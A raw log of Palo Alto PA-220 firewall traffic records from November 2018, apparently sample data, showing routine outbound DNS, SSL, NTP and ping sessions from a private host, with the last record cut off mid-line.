16:09:45,192.168.15.224,35.190.88.148,192.168.1.63,35.190.88.148,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.186.243.83,192.168.1.63,35.186.243.83,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,100.24.165.74,192.168.1.63,100.24.165.74,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,184.51.252.247,192.168.1.63,184.51.252.247,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,35.201.94.140,192.168.1.63,35.201.94.140,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:51 PA-220 1,2018/11/30 